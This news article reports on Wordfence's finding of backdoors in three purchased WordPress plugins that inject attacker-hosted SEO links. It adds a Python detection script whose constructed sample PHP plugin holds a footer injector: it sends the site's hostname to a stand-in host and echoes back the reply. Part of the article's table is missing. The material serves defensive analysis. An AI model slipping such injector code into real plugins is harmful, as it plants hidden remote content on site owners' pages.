The WordPress plugin ecosystem has drawn close scrutiny from researchers in recent weeks. Three years ago, backdoors were found in 14 plugins for the popular CMS, and those plugins were removed from the official repository; a recent study nonetheless showed that hundreds of sites are still running them.
Shortly before that, a backdoor was found in the Captcha plugin in the WordPress Plugin Directory. Captcha was installed on about 300,000 sites, and the WordPress team took the unprecedented step of forcibly replacing the malicious version with a "clean" one on affected sites.
Now Wordfence analysts have reported that three more plugins contain the same kind of backdoor.
Wordfence's summary table of the three plugins survived only in part; the cells that can still be read are:
- a plugin with 50,000+ active installs; malicious version v2.1.0 (August 2017)
- No Follow All External Links: 9,000+ active installs; malicious version v2.1.0 (April 2017); contacts cloud.wpserve.org; December 19, 2017
- a plugin with 30,000+ active installs; December 22, 2017
The behaviour of these plugins matches the earlier cases: each one contacts a server controlled by the attackers and injects content and SEO links into the pages of infected sites.
Wordfence researchers believe all three infections are most likely the work of the same attacker, a conclusion they reached after a thorough investigation. In two of the three cases the backdoors contact domains hosted on the same IP address. Two of the three plugins were bought from their developers by the same company, Orb Online, and in both cases the purchase offers followed the same template. Most tellingly, the backdoor code is almost identical in all three plugins.
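The two preceding paragraphs describe what the backdoors do (fetch content from an attacker-controlled host and write it into the page) and how the cases were tied together (domains resolving to one IP, near-identical code). The script below is an added example of how a practitioner might hunt for that behaviour across installed plugins; it is not Wordfence's tooling and not the backdoor code from the report. The PHP sample plugin, the `.invalid` domains, and the resolver table are constructed for this example, and the taint tracking is deliberately crude (line-level, no control flow), so treat hits as leads to read by hand, not verdicts.

```python
"""Added example: hunt for WordPress plugin code that pulls remote content into pages.

Not Wordfence's tooling and not the backdoor code from the report. Flags the
pattern the article describes (a hard-coded external URL is fetched and the
response reaches echo/print/eval) and shows the IP pivot used to tie C2
domains together. Sample plugin, domains and resolver table are constructed.
"""
import re
from collections import defaultdict

# PHP/WordPress calls that pull data from a remote host.
FETCH_FUNCS = ("wp_remote_get", "wp_remote_post", "wp_remote_request",
               "file_get_contents", "curl_setopt")
FETCH_RE = re.compile(r"\b(?:%s)\s*\(" % "|".join(FETCH_FUNCS))
ASSIGN_RE = re.compile(r"^\s*(\$[A-Za-z_]\w*)\s*=(?!=)(.*)$")
SINK_RE = re.compile(r"\b(?:echo|print|eval|assert|create_function)\b")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def find_remote_fetches(php_source):
    """One finding per line that calls a fetch function with a literal external URL."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        url = URL_RE.search(line)
        if FETCH_RE.search(line) and url:
            findings.append({"line": lineno, "domain": url.group(1).lower()})
    return findings


def _mentions(code, var):
    return re.search(re.escape(var) + r"\b", code) is not None


def fetched_then_output(php_source):
    """Lines where data from a remote fetch reaches echo/print/eval.

    A variable assigned from a fetch call, or from an expression containing an
    already-tainted variable, is tainted; a sink line naming a tainted variable
    is reported. Line-level only: no scoping, branches or function boundaries.
    """
    tainted, hits = set(), []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        assign = ASSIGN_RE.match(line)
        if assign:
            lhs, rhs = assign.group(1), assign.group(2)
            if FETCH_RE.search(rhs) or any(_mentions(rhs, v) for v in tainted):
                tainted.add(lhs)
            continue
        if SINK_RE.search(line):
            for var in sorted(tainted):
                if _mentions(line, var):
                    hits.append({"line": lineno, "var": var})
    return hits


def group_domains_by_ip(domains, resolve):
    """Group domains that resolve to the same address (the pivot described above).

    `resolve` maps a hostname to an IPv4 string or None. For live lookups wrap
    socket.gethostbyname and return None on socket.gaierror.
    """
    by_ip = defaultdict(set)
    for d in domains:
        ip = resolve(d)
        if ip:
            by_ip[ip].add(d)
    return {ip: sorted(ds) for ip, ds in by_ip.items() if len(ds) > 1}


# Constructed sample plugin: one benign update check, one footer injector.
SAMPLE_PLUGIN = r"""<?php
/* Plugin Name: Sample Plugin (constructed for this example) */
function sp_check_update() {
    $resp = wp_remote_get('https://api.wordpress.org/plugins/info/1.0/sample.json');
    update_option('sp_update_json', wp_remote_retrieve_body($resp));
}
function sp_footer() {
    $resp = wp_remote_get('http://cdn-a.invalid/l.php?h=' . $_SERVER['HTTP_HOST']);
    $html = wp_remote_retrieve_body($resp);
    echo $html;
}
add_action('wp_footer', 'sp_footer');
"""

# Constructed resolver table (documentation address ranges, not real lookups).
FAKE_DNS = {"cdn-a.invalid": "192.0.2.10", "cdn-b.invalid": "192.0.2.10",
            "cdn-c.invalid": "192.0.2.77", "api.wordpress.org": "198.51.100.5"}


if __name__ == "__main__":
    for f in find_remote_fetches(SAMPLE_PLUGIN):
        print("fetch   line %(line)d -> %(domain)s" % f)
    for h in fetched_then_output(SAMPLE_PLUGIN):
        print("inject  line %(line)d via %(var)s" % h)
    print(group_domains_by_ip(FAKE_DNS, FAKE_DNS.get))
```

Run it over `wp-content/plugins/*/*.php` with a real resolver to get a first cut: the fetch list tells you which hosts a plugin talks to, the taint pass separates a legitimate update check (response stored, never echoed) from a footer injector, and the IP grouping surfaces the kind of shared-hosting overlap that linked two of the three cases here.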
Analysts note with regret that this is now an established pattern, effectively a fraud scheme: a company buys a plugin from its developer, waits a while, and then ships a malicious update that infects every site that installs it. The scale is often very large.
The recent backdooring of the Captcha plugin, for example, has been linked to a specific person. Security researchers found that the campaign was run by someone previously caught distributing backdoors through plugins: according to analysts, this is Mason Soiza, who was earlier caught injecting malicious code into the Display Widgets plugin. As a reminder, that plugin was removed from the official repository four times.